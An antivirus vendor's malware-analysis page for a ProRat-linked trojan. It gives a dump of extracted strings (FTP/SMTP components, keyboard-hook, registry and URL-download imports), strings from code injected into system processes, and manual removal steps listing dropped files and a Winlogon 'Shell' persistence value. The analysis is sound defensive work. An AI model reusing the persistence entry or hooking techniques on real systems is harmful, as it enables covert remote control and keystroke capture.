@$xp$22Smtpprot@TSmtpNextProc
@$xp$25Ftpsrv@FtpServerException
@$xp$25Ftpsrv@TFtpSrvCommandProc
@$xp$25Smtpprot@TSmtpContentType
@$xp$25Smtpprot@TSmtpRequestDone
@$xp$26Ftpsrv@TFtpCtrlSocketClass
@$xp$26Smtpprot@TCustomSmtpClient
@$xp$26Smtpprot@TSmtpAttachHeader
@$xp$26Smtpprot@TSmtpGetDataEvent
@$xp$29Smtpprot@TSmtpHeaderLineEvent
@$xp$30Ftpsrv@TFtpSrvCommandTableItem
@$xp$31Ftpsrv@TFtpSrvAuthenticateEvent
@$xp$31Ftpsrv@TFtpSrvRetrDataSentEvent
@$xp$31Ftpsrv@TFtpSrvValidateXferEvent
@$xp$31Ftpsrvc@EFtpCtrlSocketException
@$xp$32Ftpsrv@TFtpSrvClientCommandEvent
@$xp$32Ftpsrv@TFtpSrvClientConnectEvent
@$xp$32Ftpsrv@TFtpSrvDataAvailableEvent
@$xp$32Smtpprot@TSmtpProcessHeaderEvent
@$xp$33Ftpsrv@TFtpSrvAnswerToClientEvent
@$xp$33Ftpsrv@TFtpSrvBuildDirectoryEvent
@$xp$34Ftpsrv@TFtpSrvChangeDirectoryEvent
@$xp$35Smtpprot@TSmtpAttachmentContentType
@$xp$39Ftpsrv@TFtpSrvDataSessionConnectedEvent
@Ftpsrv@CopyRight
@Ftpsrv@Finalization$qqrv
@Ftpsrv@FtpServerException@
@Ftpsrv@Register$qqrv
@Ftpsrv@TFtpServer@
@Ftpsrv@TFtpServer@$bctr$qqrp18Classes@TComponent
@Ftpsrv@TFtpServer@$bdtr$qqrv
@Ftpsrv@TFtpServer@AddCommand$qqrx17System@AnsiStringxynpqqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2$v
@Ftpsrv@TFtpServer@BuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%p15Classes@TStreamo
@Ftpsrv@TFtpServer@ClientCommand$qqrp14System@TObjectpci
@Ftpsrv@TFtpServer@ClientDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientPassiveSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorDataAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@CommandABOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandAPPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCDUP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandChangeDir$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDELE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2o
@Ftpsrv@TFtpServer@CommandLIST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMDTM$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMKD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNLST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNOOP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASS$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASV$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPORT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandQUIT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandREST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRETR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRMD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNFR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNTO$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSIZE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTRU$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSYST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandTYPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandUSER$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandXPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@DisconnectAll$qqrv
@Ftpsrv@TFtpServer@GetActive$qqrv
@Ftpsrv@TFtpServer@GetClientCount$qqrv
@Ftpsrv@TFtpServer@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@SendNextDataChunk$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocket
@Ftpsrv@TFtpServer@ServSocketSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ServSocketStateChange$qqrp14System@TObject20Wsocket@TSocketStatet2
@Ftpsrv@TFtpServer@SetActive$qqro
@Ftpsrv@TFtpServer@Start$qqrv
@Ftpsrv@TFtpServer@StartSendData$qqrp22Ftpsrvc@TFtpCtrlSocket
@Ftpsrv@TFtpServer@Stop$qqrv
@Ftpsrv@TFtpServer@TriggerAlterDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerAuthenticate$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringt2ro
@Ftpsrv@TFtpServer@TriggerBuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerChangeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerClientCommand$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@TriggerClientConnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerClientDisconnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerMakeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerRetrDataSent$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerSendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@TriggerServerStart$qqrv
@Ftpsrv@TFtpServer@TriggerServerStop$qqrv
@Ftpsrv@TFtpServer@TriggerStorDataAvailable$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketpcius
@Ftpsrv@TFtpServer@TriggerStorSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerStorSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerValidateDele$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateGet$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidatePut$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnFr$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnTo$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@WMFtpSrvAbortTransfer$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvClientClosed$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseData$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseRequest$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WndProc$qqrr17Messages@TMessage
@Ftpsrv@initialization$qqrv
@Ftpsrvc@CopyRight
@Ftpsrvc@EFtpCtrlSocketException@
@Ftpsrvc@Finalization$qqrv
@Ftpsrvc@IsUNC$qqr17System@AnsiString
@Ftpsrvc@PatchIE5$qqrr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@
@Ftpsrvc@TFtpCtrlSocket@$bctr$qqrp18Classes@TComponent
@Ftpsrvc@TFtpCtrlSocket@$bdtr$qqrv
@Ftpsrvc@TFtpCtrlSocket@Dup$qqri
@Ftpsrvc@TFtpCtrlSocket@GetPeerAddr$qqrv
@Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetAbortingTransfer$qqro
@Ftpsrvc@TFtpCtrlSocket@SetDirectory$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetRcvSize$qqri
@Ftpsrvc@TFtpCtrlSocket@StartConnection$qqrv
@Ftpsrvc@TFtpCtrlSocket@TriggerCommand$qqrpci
@Ftpsrvc@TFtpCtrlSocket@TriggerDataAvailable$qqrus
@Ftpsrvc@TFtpCtrlSocket@TriggerSessionConnected$qqrus
@Ftpsrvc@initialization$qqrv
@Ftpsrvt@CopyRight
@Ftpsrvt@FileUtcStr$qqr17System@AnsiString
@Ftpsrvt@Finalization$qqrv
@Ftpsrvt@initialization$qqrv
@Smtpprot@CopyRight
@Smtpprot@Finalization$qqrv
@Smtpprot@Register$qqrv
@Smtpprot@Rfc822DateTime$qqr16System@TDateTime
@Smtpprot@SmtpException@
@Smtpprot@TCustomSmtpClient@
@Smtpprot@TCustomSmtpClient@$bctr$qqrp18Classes@TComponent
@Smtpprot@TCustomSmtpClient@$bdtr$qqrv
@Smtpprot@TCustomSmtpClient@Abort$qqrv
@Smtpprot@TCustomSmtpClient@CheckReady$qqrv
@Smtpprot@TCustomSmtpClient@ClearErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@Connect$qqrv
@Smtpprot@TCustomSmtpClient@Data$qqrv
@Smtpprot@TCustomSmtpClient@DataNext$qqrv
@Smtpprot@TCustomSmtpClient@DisplayLastResponse$qqrv
@Smtpprot@TCustomSmtpClient@DoHighLevelAsync$qqrv
@Smtpprot@TCustomSmtpClient@DoUUEncode$qqrrpvr17System@AnsiStringro
@Smtpprot@TCustomSmtpClient@EndUUEncode$qqrrpv
@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v
@Smtpprot@TCustomSmtpClient@Helo$qqrv
@Smtpprot@TCustomSmtpClient@HighLevelAsync$qqr21Smtpprot@TSmtpRequest45System@%Set$t17Smtpprot@TSmtpFct$iuc$0$iuc$8%
@Smtpprot@TCustomSmtpClient@InitUUEncode$qqrrpv17System@AnsiString
@Smtpprot@TCustomSmtpClient@Mail$qqrv
@Smtpprot@TCustomSmtpClient@MailFrom$qqrv
@Smtpprot@TCustomSmtpClient@NextExecAsync$qqrv
@Smtpprot@TCustomSmtpClient@Open$qqrv
@Smtpprot@TCustomSmtpClient@Quit$qqrv
@Smtpprot@TCustomSmtpClient@RcptTo$qqrv
@Smtpprot@TCustomSmtpClient@RcptToDone$qqrv
@Smtpprot@TCustomSmtpClient@RcptToNext$qqrv
@Smtpprot@TCustomSmtpClient@Rset$qqrv
@Smtpprot@TCustomSmtpClient@SendCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@SetContentType$qqr25Smtpprot@TSmtpContentType
@Smtpprot@TCustomSmtpClient@SetErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@SetMailMessage$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@SetRcptName$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState
@Smtpprot@TCustomSmtpClient@TriggerCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerDisplay$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerGetData$qqripciro
@Smtpprot@TCustomSmtpClient@TriggerHeaderLine$qqrpci
@Smtpprot@TCustomSmtpClient@TriggerProcessHeader$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@TriggerRequestDone$qqrus
@Smtpprot@TCustomSmtpClient@TriggerResponse$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerSessionClosed$qqrus
@Smtpprot@TCustomSmtpClient@TriggerSessionConnected$qqrus
@Smtpprot@TCustomSmtpClient@TriggerStateChange$qqrv
@Smtpprot@TCustomSmtpClient@Vrfy$qqrv
@Smtpprot@TCustomSmtpClient@WMSmtpRequestDone$qqrr17Messages@TMessage
@Smtpprot@TCustomSmtpClient@WSocketDataAvailable$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDataSent$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDnsLookupDone$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionClosed$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionConnected$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WndProc$qqrr17Messages@TMessage
@Smtpprot@TSmtpCli@
@Smtpprot@TSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSmtpCli@$bdtr$qqrv
@Smtpprot@TSmtpCli@Data$qqrv
@Smtpprot@TSmtpCli@PrepareEMail$qqrv
@Smtpprot@TSmtpCli@SetEMailFiles$qqrp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerAttachContentType$qqrir17System@AnsiStringt2
@Smtpprot@TSmtpCli@TriggerAttachHeader$qqri17System@AnsiStringp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerGetData$qqripciro
@Smtpprot@TSmtpCli@TriggerHeaderLine$qqrpci
@Smtpprot@TSyncSmtpCli@
@Smtpprot@TSyncSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSyncSmtpCli@AbortSync$qqrv
@Smtpprot@TSyncSmtpCli@ConnectSync$qqrv
@Smtpprot@TSyncSmtpCli@DataSync$qqrv
@Smtpprot@TSyncSmtpCli@HeloSync$qqrv
@Smtpprot@TSyncSmtpCli@MailFromSync$qqrv
@Smtpprot@TSyncSmtpCli@MailSync$qqrv
@Smtpprot@TSyncSmtpCli@OpenSync$qqrv
@Smtpprot@TSyncSmtpCli@QuitSync$qqrv
@Smtpprot@TSyncSmtpCli@RcptToSync$qqrv
@Smtpprot@TSyncSmtpCli@RsetSync$qqrv
@Smtpprot@TSyncSmtpCli@Synchronize$qqrynpqqrv$v
@Smtpprot@TSyncSmtpCli@VrfySync$qqrv
@Smtpprot@TSyncSmtpCli@WaitUntilReady$qqrv
@Smtpprot@initialization$qqrv
@Wsocket@TCustomSocksWSocket@SetSocksPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@GetPeerPort$qqrv
@Wsocket@TCustomWSocket@GetRemotePort$qqrv
@Wsocket@TCustomWSocket@GetXPort$qqrv
@Wsocket@TCustomWSocket@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Wsocket@TCustomWSocket@SetLocalPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@SetRemotePort$qqr17System@AnsiString
@Wsocket@WSocketResolvePort$qqr17System@AnsiStringt1
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
220 Welcom to ProRat-Ftp-Server
CreatePipe
GetProcessHeap
WinExec
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegFlushKey
RegOpenKeyExA
RegQueryInfoKeyA
SetViewportOrgEx
ShellExecuteA
URLDownloadToFileA
ActivateKeyboardLayout
EnumThreadWindows
EnumWindows
ExitWindowsEx
GetKeyNameTextA
GetKeyState
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardType
LoadKeyboardLayoutA
MapVirtualKeyA
MsgWaitForMultipleObjects
keybd_event
`.data
P.idata
@.edata
@.rsrc
@.reloc

services.exe_1716_rwx_00AE1000_00005000:

RegEnumKeyW
Advapi32.dll
kernel32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
user32.dll
%WinDir%\services.exe
KERNEL32.dll
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
GetCPInfo
TESTDLL.dll

Explorer.EXE_532_rwx_01E01000_00005000:

RegEnumKeyW
Advapi32.dll
kernel32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
user32.dll
%WinDir%\Explorer.EXE
KERNEL32.dll
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
GetCPInfo
TESTDLL.dll


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    TASKKILL.exe:716
    net1.exe:1140
    fservice.exe:1264
    win_a32.exe:1452
    incom.exe:1076
    NET.exe:644
    %original file name%.exe:560

  2. Delete the original Generic file.
  3. Delete or disinfect the following files created/modified by the Generic:

    %WinDir%\services.exe (2105 bytes)
    %WinDir%\system\sservice.exe (2105 bytes)
    %System%\incom.exe (45172 bytes)
    %System%\incom_.exe (3172 bytes)
    %System%\incom.exe.bat (99 bytes)
    %System%\fservice.exe (2105 bytes)
    C:\%original file name%.exe.bat (119 bytes)
    %System%\win_a32.exe (49908 bytes)

  4. Remove the references to the Generic by modifying the following registry value(s) (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "Explorer.exe %System%\fservice.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now